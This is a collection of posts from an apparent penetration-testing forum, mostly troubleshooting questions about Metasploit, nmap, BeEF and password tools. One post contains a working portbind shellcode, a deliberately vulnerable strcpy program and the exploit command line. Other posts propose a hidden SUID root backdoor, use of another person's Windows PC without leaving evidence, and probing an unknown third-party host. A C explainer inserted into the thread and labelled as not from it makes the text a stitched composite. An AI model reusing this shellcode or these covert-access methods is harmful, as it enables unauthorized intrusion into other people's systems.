9:24
»
remote-exploit
If you haven't already seen it, check it out:
SHODAN - Computer Search Engine
It is more or less a search engine for servers--so a search engine of banner grabs--port 80, 21, 22, 23. Very cool.
A few examples:
SHODAN - Computer Search Engine -- 2,900+ still running IIS 4.0!
SHODAN - Computer Search Engine -- 67,000 Cisco web interfaces...
Refine by country code, hostname, port, and CIDR/IP range.
Created by @achillean (achillean on Twitter), awesome tool.
-
4:58
»
remote-exploit
Hello,
When I try to test my partner's web host (Microsoft server) password with ./RWW.attack, it waits some time and at last outputs:
Quote:
@net-desktop:/pentest/passwords/rww-attack# ./RWW-Attack-0.9.2.py -t 127.0.0.1 -u /root/user -p /root/d.txt
====================================================================
# RWW-Attack 0.9.2 #
# coded by Bruk0ut #
# #
# bugs/comments to mikey27 ..:<-at->:.. hotmail.com #
# greetz fly out to offsec,remote-exploit,hak5 & authors of pycurl #
====================================================================
Disclaimer:
This program is to be used only with permission of the owner of the target host and is for use in penetration testing only. If this is not the case you must stop using this program now!
rm: cannot remove `/tmp/rww-cookies.txt': No such file or directory
Loading Users...
438 Users Loaded
Loading Passwords...
padding end of password list to make %5 for threads
Passwd list now: 70375
70375 Passwords Loaded
total passes tried: 0 total successes : 0
problem retrieving data from host... check target hostname!
|
But I am not able to understand how it works.
I am not here for anything illegal; I have full permission to check the password of a host. For this reason I have posted here.
Now my question: how can I tell that it is working?
Thank you.
-
-
20:07
»
remote-exploit
How to redirect the screen output of Metasploit Console to a file?
Thank you guys!:D
-
10:58
»
remote-exploit
hi,
I'm wondering if there is another way to get the router password instead of bruteforcing the router. Is it possible to sniff a whole day's traffic only on the router, so that when I log on to the router from my brother's laptop I could catch the username and password via Wireshark or something else?
thx
-
-
17:32
»
remote-exploit
Simple question... When I scan systems that support the SMB2 dialect they report back with SMB 2.2 dialect, and when running Metasploit using the SMB exploit/scanner I have more problems than before...
Might this be because I am outdated?
Is the SMB2 exploit patched with SMB dialect 2.2 (Vista, Win7)?
-
-
0:28
»
remote-exploit
The Katana: Portable Multi-Boot Security Suite is a tool which comes preconfigured with many portable security tools, including BT4pre. Katana can be found @ hackfromacave.com/katana.html. Katana includes distributions and applications which focus on Penetration Testing, Auditing, Password Cracking, Forensics and Honey Pots.
That's right, it's an octuple boot system which includes:
- Backtrack 4 pre
- the Ultimate Boot CD
- Organizational Systems Wireless Auditor (OSWA) Assistant
- the Ultimate Boot CD for Windows
- Got Root? Slax
- Ophcrack Live
- Damn Small Linux
- Damn Vulnerable Linux
This project allows you to add and remove distros fairly easily. With an option to update from BT4pre to BT4 whenever it is released. It also comes preinstalled with over 100 portable Windows applications, such as Wireshark, HiJackThis, Unstoppable Copier, Firefox, OpenOffice, The Sleuth Kit, PuTTY, and OllyDBG.
-
-
2:52
»
remote-exploit
Hi, I'm trying to work out how to do a small jump. I'm using the opcode eb, and would like to jump 10 instructions.
Do I have to add an offset or linear number in front of or behind it?
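The short jump the poster asks about is encoded as EB followed by a signed 8-bit displacement counted from the end of the two-byte instruction, so "jump 10 instructions" means adding up the byte lengths of those 10 instructions rather than writing 10. This added example (not from the thread) encodes and decodes EB rel8 and computes the displacement needed to skip a run of instructions; the instruction lengths it uses are a constructed sample.

```c
/* Added example: encoding of the x86 short jump "EB rel8".
 * rel8 is a signed byte relative to the address of the instruction that
 * FOLLOWS the jump (i.e. jump address + 2), not to the jump itself. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define JMP_SHORT_OPCODE 0xEB
#define JMP_SHORT_LEN    2

/* Encode "jmp short <to>" placed at address <from> into out[2].
 * Returns 0 on success, -1 when the displacement does not fit in a signed
 * byte (-128..127); in that case the 5-byte near jump E9 rel32 is needed. */
int encode_short_jmp(uint32_t from, uint32_t to, uint8_t out[2])
{
    int64_t disp = (int64_t)to - ((int64_t)from + JMP_SHORT_LEN);
    if (disp < -128 || disp > 127)
        return -1;
    out[0] = JMP_SHORT_OPCODE;
    out[1] = (uint8_t)(int8_t)disp;   /* two's-complement rel8 */
    return 0;
}

/* Decode: where does an EB rel8 located at address <at> land? */
uint32_t short_jmp_target(uint32_t at, uint8_t rel8)
{
    return (uint32_t)((int64_t)at + JMP_SHORT_LEN + (int8_t)rel8);
}

/* The poster's case: skip the next <count> instructions. The jump lands on
 * the instruction after them, so rel8 is the sum of their encoded byte
 * lengths (lens[], read off a disassembly listing). Returns -1 when that
 * sum is out of short-jump range. */
int rel8_to_skip(const uint8_t *lens, size_t count)
{
    int total = 0;
    for (size_t i = 0; i < count; i++)
        total += lens[i];
    return total <= 127 ? total : -1;
}

int main(void)
{
    uint8_t enc[2];
    /* Constructed sample: the 10 instructions of a socket() call sequence
     * (push imm8, pop, push imm8, pop, cltd, push, push, push imm8,
     * mov esp->ecx, int 0x80) occupy 2,1,2,1,1,1,1,2,2,2 bytes. */
    const uint8_t lens[10] = {2, 1, 2, 1, 1, 1, 1, 2, 2, 2};
    int rel = rel8_to_skip(lens, 10);            /* 15 bytes -> EB 0F */
    printf("rel8 to skip 10 instructions: %d (EB %02X)\n", rel, rel);

    /* Backward jump from 0x08048010 to 0x08048000: disp = -18 -> EB EE */
    if (encode_short_jmp(0x08048010, 0x08048000, enc) == 0)
        printf("jmp back: %02X %02X -> 0x%08X\n", enc[0], enc[1],
               short_jmp_target(0x08048010, enc[1]));

    /* 0x200 bytes forward does not fit in rel8 */
    if (encode_short_jmp(0, 0x200, enc) != 0)
        printf("0x200 bytes is out of short-jump range, use E9 rel32\n");
    return 0;
}
```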
-
-
8:31
»
remote-exploit
Folks,
On Gentoo and Ubuntu (the ones I tested), when I run john --users=root shadow I get
No password hashes loaded
I also tried unshadow /etc/passwd /etc/shadow > mypwd
the same message
Does it still work these days?
Thanks in advance
-
-
9:07
»
remote-exploit
My private IP address scheme is in the 192.168.1.x subnet. Here is my network diagram:
Quote:
DSL-Modem (192.168.1.1)
|
|
Switch
|
My-PC (192.168.1.x)
and a voip phone (192.168.1.x)
|
But there is an IP address 192.168.0.1 which can be pinged from my modem as well as from my computer. The result of the ping is
Quote:
> ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1): 56 data bytes
56 bytes from 192.168.0.1: icmp_seq=0 ttl=250 time=35.0 ms
56 bytes from 192.168.0.1: icmp_seq=1 ttl=250 time=35.0 ms
56 bytes from 192.168.0.1: icmp_seq=2 ttl=250 time=30.0 ms
--- 192.168.0.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 30.0/33.3/35.0 ms
|
I did a traceroute and the result is
Quote:
C:\nmap-5.00>tracert 192.168.0.1
Tracing route to 192.168.0.1 over a maximum of 30 hops
1 1 ms <1 ms <1 ms 192.168.1.1
2 34 ms 39 ms 40 ms 116.71.208.1
3 32 ms 32 ms 33 ms 116.71.241.245
4 36 ms 36 ms 36 ms rwp44.pie.net.pk [221.120.253.41]
5 36 ms 36 ms 35 ms 221.120.253.10
6 35 ms 35 ms 35 ms 192.168.0.1
Trace complete.
|
I ran nmap with parameters (-sV -oO -v) and the output is
Quote:
C:\nmap-5.00>nmap.exe -sV -oO -v 192.168.0.1
Starting Nmap 5.00 at 2009-11-04 19:10 Pakistan Standard Time
NSE: Loaded 3 scripts for scanning.
Initiating Ping Scan at 19:10
Scanning 192.168.0.1 [4 ports]
Completed Ping Scan at 19:10, 0.36s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:10
Completed Parallel DNS resolution of 1 host. at 19:10, 0.04s elapsed
Initiating SYN Stealth Scan at 19:10
Scanning 192.168.0.1 [1000 ports]
Discovered open port 22/tcp on 192.168.0.1
Discovered open port 23/tcp on 192.168.0.1
Completed SYN Stealth Scan at 19:10, 6.40s elapsed (1000 total ports)
Initiating Service scan at 19:10
Scanning 2 services on 192.168.0.1
Completed Service scan at 19:10, 7.56s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.0.1.
NSE: Script Scanning completed.
Host 192.168.0.1 is up (0.043s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
23/tcp open telnet?
1720/tcp filtered H.323/Q.931
5060/tcp filtered sip
1 service unrecognized despite returning data. If you know the service/version,
please submit the following fingerprint at
Read data files from: C:\nmap-5.00
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.25 seconds
Raw packets sent: 1174 (51.632KB) | Rcvd: 1162 (46.500KB)
|
Another nmap OS fingerprint scan shows
Quote:
Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-04 19:31 Pakistan Standard Time
NSE: Loaded 0 scripts for scanning.
Initiating Ping Scan at 19:31
Scanning 192.168.0.1 [4 ports]
Completed Ping Scan at 19:31, 0.38s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:31
Completed Parallel DNS resolution of 1 host. at 19:31, 0.04s elapsed
Initiating SYN Stealth Scan at 19:31
Scanning 192.168.0.1 [1000 ports]
Discovered open port 23/tcp on 192.168.0.1
Discovered open port 22/tcp on 192.168.0.1
Completed SYN Stealth Scan at 19:31, 7.45s elapsed (1000 total ports)
Initiating OS detection (try #1) against 192.168.0.1
Retrying OS detection (try #2) against 192.168.0.1
Host 192.168.0.1 is up (0.039s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
1720/tcp filtered H.323/Q.931
5060/tcp filtered sip
Device type: switch|WAP
Running (JUST GUESSING) : HP embedded (88%), D-Link embedded (86%), TRENDnet embedded (86%), 3Com embedded (86%)
Aggressive OS guesses: HP 4000M ProCurve switch (J4121A) (88%), D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (86%), 3Com 8810 switch (86%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=18 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
|
Telnetting to this machine gives the banner
Quote:
***********************************************************
* All rights reserved (2000-2007) *
* Without the owner's prior written consent, *
* no decompiling or reverse-engineering shall be allowed. *
* Notice: *
* This is a private communication system. *
* Unauthorized access or use may lead to prosecution. *
***********************************************************
Login authentication
Username:
|
Neotrace gives the following output
Quote:
Map
Node Data
Node Net Reg IP Address Location Node Name
1 - - 192.168.1.x
2 1 - 192.168.1.1 -
3 2 - 116.71.208.1 -
4 2 - 116.71.241.245 -
5 3 - 221.120.253.41 - rwp44.pie.net.pk
6 3 - 221.120.253.10 - rwp44.pie.net.pk
7 1 - 192.168.0.1 -
Packet Data
Node High Low Avg Total Lost
1 0 0 0 1 0
2 25 25 25 1 0
3 135 135 135 1 0
4 44 44 44 1 0
5 37 37 37 1 0
6 36 36 36 1 0
7 38 38 38 1 0
Network Data
Network id#:1
OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
Network id#:2
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
Network id#:3
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
|
I think that the IP addresses 192.168.x.x are private addresses and are non-routable (meaning you shouldn't be able to access these addresses if they are not from your internal network). As the traceroute shows, the machine is behind PIE and it seems to be quite well set up.
I am trying to investigate the machine on my own but have no idea how to proceed further.
What could this machine be? Any wild guesses? And one more thing: you people should also try probing this machine, and make sure not to confuse your own router with it :-)
-
-
17:13
»
remote-exploit
Something interesting just came up when I was talking to a friend of mine - we were discussing a penetration for PCI compliance, and the topic of IPS came up.
The lengthy argument was profuse and emphatic, but the same basic question (I feel) has to be asked:
During a PCI test (or any other), should one request the client turn off the IPS*? The two main arguments that I can see are:
No. The attacker wouldn't be able to get that turned off, so why should you?
Yes. What if the attacker gets lucky and finds the IPS on the day it's failed - at least this way you can ensure you are not vulnerable.
So I put it to the rest of you, should the IPS be turned off for the pentester, or should it be left on?
*Turning it into IDS mode for that IP would be acceptable, the concern is the prevention part of the IPS.
-
-
19:03
»
remote-exploit
I'm doing a lab at home via VMware. My attacker is BackTrack (of course) and my target is Linux Slackware. So far I have only been able to get as far as logging onto its FTP as anonymous (nothing really useful in there) and connecting to the target via TFTP. I'm still quite new to pen-testing so I'm not sure what I could do with this TFTP access. I see that I am able to run commands such as "get" and "put". I was able (I think) to copy netcat over to the target but am not sure how I can connect to the target via netcat. Since I don't have access to the target yet, I can't start a listener on the box (unless one of you knows a way). If I could start a listener then I assume the best bet would be to retrieve /bin/bash with the nc -e option. The following are the ports which are open. *This is all on my personal lab, just an FYI*
21 ftp vsftpd 2.0.4
22 ssh OpenSSH 4.3
80 http Apache
[httpd] 2.2.4 mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2
631 ipp CUPS 1.1
Thanks for any help or a push in the right direction.
-
1:37
»
remote-exploit
Considering the advent of Ubuntu systems, and our own precious Backtrack rolling that particular way, I thought I would do an early release of a tool I have been working on for a while - partly because it may benefit the community, and mostly because my expect skills are not as strong as they used to be and I can't get this operational.
The basic premise is thus: Ubuntu is secure, right? You don't run as admin, and any malware that accesses your desktop can only wipe your stuff, not the system (as if this is less important to me, but it illustrates the need for good backups). You use sudo to run your nmap scans or maybe start your airodump script, so you're safe. Right?
Wrong
The key to this puzzle is, in fact, the very tool people use to keep themselves safe. Some notes on sudo basics:
- "sudo -s", "sudo sh" or "sudo su -" or variants will grant you a root shell.
- sudo grants you a small amount of time before it "expires", which means you only have to type your password once and you have a while to run root commands to your heart's content
- sudo is not tied to a single console; you can open 18 different xterms and run it just fine
A, well, flaw I noticed in sudo (if it can be called thus) resides in the 3rd point: sudo does not actually check what console I am operating in. If I am on my desktop and I type "sudo nc -l 5", anyone who is ssh'd into my box can then type "sudo ./install_rootkit.sh". Further, I can write an expect script (as yet unpublished) to attempt this command (or another, such as "sudo -s") for as long as I like; while the password is being requested, sudo seems to fail to report the attempt (perhaps this is a logging feature I have merely never noticed).
The upside of this? A pentester, or anyone else really, can abuse the sudo powers to gain root on a linux desktop (or server) as easily as if it were vulnerable to sock_sendpage(). The only thing required is some patience.
A note to anyone who wants to try a PoC for this: I presume that my cron/expect combination is not setting up a proper environment, so doing it that way is not a choice. But there is nothing that stops one from running it & and just waiting.
And you thought malware couldn't hurt you.
Implementation I leave up to those of you who have coding practice, but please feel free to PM me a sample code block if you have written one.
-
-
1:38
»
remote-exploit
So I worked a temp job at a college help desk for a couple of weeks. During the lulls in calls, I began poking around the campus network. Nothing intrusive, just a few pings and traceroutes at first. However, as the days went on I became so bored I started mapping the entire network and doing my own security audit of the college. At the end of the two weeks I had a page-and-a-half list of all the problems with the "security" they had implemented. Being the ethical guy I am, I sent the list to the head of the department. Fast forward two months and three emails later, and they've done nothing. Not even the simplest things on the list, like password-protecting your network printers if you're going to use 1-to-1 NAT and not use ACLs to block external access. Personally I wouldn't mess with the network because there's no challenge in it, but I'm to the point where I think these lazy/incompetent admins should be taught a lesson. At the same time I feel bad for the students/faculty that have these morons "protecting" their data. So I'm gonna put it to a vote.
Should I post all the info I obtained?
Should I email the Dean and explain why he should fire these idiots?
Should I email everyone in the student/faculty directory telling them their data isn't safe?
Should I do nothing and let their current security through obscurity model stand?
Should I post this in a different forum where someone might care?
-
-
22:34
»
remote-exploit
Hi,
Sorry for double-posting in the other thread! I missed the fact that my posts have to be approved by a mod and thought my first post would have been lost.
I have the task of demonstrating a buffer overflow on Windows XP (NO service pack installed). There are several tutorials on how to do this on the net. So I just wrote some vulnerable piece of C++ server code including:
char test[20];
...
strcpy( test, attackerstring);
where "attackerstring" is the ordinary much-too-long string passed by the client (some hundred "A" characters). The BoF seems to work and will crash the application. I am also able to overwrite both EAX and ECX (take a look at the screenshot below). However, I am not able to overwrite the crucial EIP, regardless of how ridiculously long the string of "A" characters is. 100 do not work, 500 do not work, 2000+ do not work. It doesn't help either to let OllyDbg pass the exception to my program.
SCREENSHOT: img101.imageshack.us/img101/5986/ollydbg.jpg
The exploit is running on VMware Player 2.53 & Windows XP SP0. All tutorials and forum posts I have browsed require me to access the EIP. Does anybody have an idea why it is not working for me? I'm really in despair by now.
Thanks for your efforts, m.
-
-
19:32
»
remote-exploit
Hey people, I can't figure out how to import a Nessus .nbe file into the database that I create in msfconsole. I know you have to load the sqlite3 plugin, then I do db_import_nessus_nbe "C:documents and settingshackboysmy documents"name of nbe file"" << without quotes. Is this right? Because when I press enter it says *usage db_import_nessus_nbe [.nbe file]. Any help would be great :)
-
11:13
»
remote-exploit
I am having an issue using the latest version of BeEF. I have set the alert dialogue to autorun and the logs are showing the different IPs as connected. Also, the alert dialogue box is being displayed on the victims. However, they never show up as a Zombie. I know it takes some time to be displayed, but waiting up to five minutes and still no zombies. I am testing using mutillidae on a windows XP SP2 VM and backtrack 4 pre-final running the latest version of BeEF. I have tried IE 6 as well as various versions of FireFox. I do not have any add-ons like no script installed and javascript is enabled on both browsers. Any idea why the Zombies section is not being populated?
Nevermind, I was too quick to post. Turned off autorun and now the zombies are showing up.
-
-
19:42
»
remote-exploit
Hi there,
I'm new to this forum and I hope I can get some help here (and of course I hope I can help other people :-) ). Let's come to the topic:
I'm playing around with buffer overflows because of a project at university.
What I am trying to do is to exploit a really stupid self-written server remotely.
The problem is the shellcode, which I did not write myself (shame on me ;) ) but found on milw0rm. To avoid complications because of the network, I'm now trying local buffer overflows first:
[code]
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void A(char * args) {
    char buffer[128];
    printf("Adresse von buffer: %x\n\n", buffer);
    memset(buffer, 'B', sizeof(buffer));
    /* intentionally unbounded copy: this is the overflow under test */
    strcpy(buffer, args);
    printf("\nbuff: [%s] (%p)(%d/%d)\n\n", buffer, buffer, sizeof(buffer), strlen(buffer));
}

int main(int argc, char * argv[]) {
    if (argc < 2)
        return 1;
    A(argv[1]);
    return 0;
}
[/code]
That one works fine with a stupid execve shellcode like this (that was for a smaller buffer...):
[code]
./target `perl -e '{ print "\x90\x90\x90\x90\xeb\x14\x5b\x31\xc0\x99\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\xb0\x0b\xcd\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; print "AAAAAA"; print "\x40\xf8\xff\xbf"; }'`
[/code]
Now I'm trying this shellcode:
[code]
/*
 * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86
 * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
 *
 * portbind shellcode that bind()'s a shell on port 64713/tcp
 *
 */
#include <stdio.h>
#include <string.h>

char shellcode[] =
/* socket(AF_INET, SOCK_STREAM, 0) */
"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x6a\x01" // push $0x1
"\x5b" // pop %ebx
"\x99" // cltd
"\x52" // push %edx
"\x53" // push %ebx
"\x6a\x02" // push $0x2
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
/* bind(s, server, sizeof(server)) */
"\x52" // push %edx
"\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713
"\x66\x6a\x02" // pushw $0x2
"\x89\xe1" // mov %esp,%ecx
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\x89\xe1" // mov %esp,%ecx
"\x89\xc6" // mov %eax,%esi
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
/* listen(s, anything) */
"\xb0\x66" // mov $0x66,%al
"\xd1\xe3" // shl %ebx
"\xcd\x80" // int $0x80
/* accept(s, 0, 0) */
"\x52" // push %edx
"\x56" // push %esi
"\x89\xe1" // mov %esp,%ecx
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\x93" // xchg %eax,%ebx
/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
"\x6a\x02" // push $0x2
"\x59" // pop %ecx
"\xb0\x3f" // mov $0x3f,%al
"\xcd\x80" // int $0x80
"\x49" // dec %ecx
"\x79\xf9" // jns dup_loop
/* execve("/bin/sh", ["/bin/sh"], NULL) */
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80

int main() {
    int (*f)() = (int(*)())shellcode;
    printf("Length: %u\n", (unsigned)strlen(shellcode));
    f();
}
// milw0rm.com [2006-04-06]
[/code]
If I execute that program, the shell on port 64731 works fine. But if I use that shellcode on my target, it crashes before execve():
Code:
pentest@****up:~$ ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
Adresse von buffer: bffff418
buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
^C
pentest@****up:~$ strace ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
execve("./testoverflow", ["./testoverflow", "jfXj1[231RSj2211341315200Rfh374311fj2211341j20QP211341211"...], [/* 37 vars */]) = 0
brk(0) = 0x804b000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=74923, ...}) = 0
mmap2(NULL, 74923, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fcc000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "177ELF111331320h1004344"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e69000
mprotect(0xb7fc5000, 4096, PROT_NONE) = 0
mmap2(0xb7fc6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fc6000
mmap2(0xb7fc9000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc9000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e68000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e686c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
open("/dev/urandom", O_RDONLY) = 3
read(3, "FN."..., 3) = 3
close(3) = 0
mprotect(0xb7fc6000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb7ffe000, 4096, PROT_READ) = 0
munmap(0xb7fcc000, 74923) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000
write(1, "Adresse von buffer: bffff418nn"..., 30Adresse von buffer: bffff418
) = 30
write(1, "n"..., 1
) = 1
write(1, "buff: [jfXj1[231RSj2211341315200Rfh374311fj2211341j"..., 168buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
) = 168
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(64713), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 3221222540) = 0
accept(3, 0, 0x3) = 4
dup2(4, 2) = 2
dup2(4, 1) = 1
dup2(4, 0) = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Does anybody have an idea how I can solve this problem? I've tried multiple shellcodes now, but no shellcode more complex than the first one works (but they all do if I call them without an overflow - weird).
Regards,
Seppel
-
-
19:47
»
remote-exploit
Let's say you have "restricted user" access to a Linux computer, the kind of user account that can't use "sudo".
If you had physical access to this machine for 10 minutes, what would you tweak in it so that from that point on, you can always do whatever you want with it... without the knowledge of anyone else who uses the computer?
I was thinking I'd boot up a live CD or live USB of Linux. Then I'd navigate to "/usr/bin" on the hard disk and make a copy of the file "xterm", maybe name it something obscure like "params" so nobody would look at it twice. Then I'd set the SUID bit on this "params" file.
From that point on, I'd be able to boot up the PC as a "restricted user" and then just run "params" whenever I want a root terminal. And once I have a root terminal, I can do whatever I want :rolleyes:
Any other ideas?
-
-
4:30
»
remote-exploit
Quote:
**************************************************
Web Server Launched. Welcome to the SET Web Attack.
**************************************************
[--] Tested on IE6, IE7, IE8 and FireFox [--]
Type <control>-c to exit..
192.168.0.59 - - [26/Oct/2009 05:11:59] "GET / [HTTP] 200 -
I get that in one of the windows :P which shows my infected computer connecting to the exploit, I guess, but then I have this in my other window
Quote:
ENCODING => shikata_ga_nai
resource> set ExitOnSession false
ExitOnSession => false
resource> exploit -j
[*] Exploit running as Background job.
msf exploit (handler) >
[*] Handler Binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler
and it just freezes there :P so what is the problem? ^^ Any ideas?
-
-
15:19
»
remote-exploit
Congratulations to HDM & team on this achievement. My condolences to the FLOSS community.
And yep, I also read "Metasploit will remain open source ... blah blah".
-
-
9:01
»
remote-exploit
I had a look at the video recently posted by pureh@te that showed how to use "chntpw" to reset the passwords on MSWindows profiles. It's great! :rolleyes:
What I'm wondering though is whether the following would be possible:
1) Boot up BT4 on the victim PC
2) Use "chntpw" to reset all passwords, then simply boot up the PC normally and boot into MSWindows. Use the PC for whatever, type a document, copy a DVD.
3) When you're finished using the PC, reboot it and boot up BT4 again. Copy the old SAM file back.
4) Now reboot the PC normally into MSWindows, the old passwords should be back in place (I think!)
Will this work fine on all versions of XP, Vista and 7?
I'm looking for a way to use a Windows machine without leaving any evidence behind (I know things like file stamps will be changed but that's not a big deal, so long as there's no gaping evidence such as the fact that their normal password isn't accepted anymore!).
Or if anybody has any other idea on how to use an MSWindows PC without leaving evidence, I'd be happy to hear.
-
8:31
»
remote-exploit
Hello!
I have a question. I bought fyodor's book for NMAP and it's been great! I am really learning the internals and best practices. But one thing i'm confused with is the host discovery flags PS PA PU. Syntax should be P[A/S/U]<port list>
Essentially, it should be probing for hosts by sending either SYN, ACK or UDP probes to the ports suggested. However, when I use it, it detects hosts that are up but on ports I didn't specify.
E.G. @my house
nmap -PS80,21,25 -PA80,21,25 -PU53 192.168.1.0/24 -v
will yield results for my http server,ftp,dns but also scan ports up to 4444 and higher.
Any reason this is happening? Am I using the flag wrong?
Thank you.
-
-
18:48
»
remote-exploit
posted in the wrong place !
moved to pen testing
I have a work-provided connection via IMS (UK business ISP) and I have been running OpenVAS against a number of our external IP addresses.
I know that some IP addresses host services that are publicly available, but when I scan for them they don't appear in the report. Also a scan with Nessus won't find them from my connection. A targeted connection or nmap scan finds them.
If I connect physically to the network on the external connection 1 hop from the firewall and do the scan, the service is found, or if I target the plugins and ports from OpenVAS from my connection it's found as well.
The unidentified service varies with the number of IP addresses I'm scanning, so it looks like something is hitting a threshold and dropping the packets.
I contacted the ISP and explained the issue, and they have confirmed that there are no packet filters, IDS/IPS etc. on my connection. But to me it looks like it is something they are doing.
I have sent them packet captures from my machine and a capture from the switch the firewall is on, which shows I send but it's not received. BT have also captured the traffic from my IP and again the scans are not showing :mad: I've even tried to scan another device connected to a home connection and checked the route to ensure it stays within their network!
We are paying a premium for the connection to be able to do unfiltered scans. Any ideas on how I can prove where the packets are being stopped?
-
-
8:46
»
remote-exploit
Hi guys !
A question:
I launched a db_autopwn session and went away; when I was back I found an opened session. That's ok, but the question is:
how can I find out which exploit worked for that session?
Hi !
-
-
